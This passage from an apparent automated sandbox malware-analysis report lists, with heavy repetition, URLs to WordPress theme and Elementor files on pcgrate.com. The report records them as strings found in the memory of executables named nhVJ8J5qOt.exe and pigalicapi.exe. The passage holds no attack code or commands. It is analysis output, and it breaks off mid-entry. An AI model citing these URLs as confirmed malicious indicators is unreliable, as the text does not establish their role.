00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/FontAwesome/css/all.min.css?ver=9.12.0
                  Source: pigalicapi.exe, 00000001.00000003.740633377.00000000050B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/icomoon-the7-font/icomoon-the7-font.min.css?v
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/above-the-fold.min.js?ver=9.12.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/compatibility/woocommerce/woocommerce.min.js?ver
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.css?ver=9
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js?ver=9.
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js?ver=
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/style.css?ver=9.12.0
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1664959878
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1684171764
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1185.css?ver=1678274495
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.710671395.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.542328041.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.672667757.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.669120345.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.675770999.0000000004510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-17.css?ver=1664959878
                  Source: nhVJ8J5qOt.exe, 00000000.00000003.689618444.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.538003645.0000000004230000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000002.828249386.0000000004060000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.637242768.0000000003610000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.576367786.0000000003850000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.544246559.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.535767330.0000000007780000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.545569232.00000000045A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.676515134.0000000003910000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.539510083.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.551009858.0000000004310000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.570322394.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536778228.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536288043.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.536718259.0000000004240000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 00000000.00000003.673330554.0000000003960000.00000004.00001000.00020000.00000000.sdmp, nhVJ8J5qOt.exe, 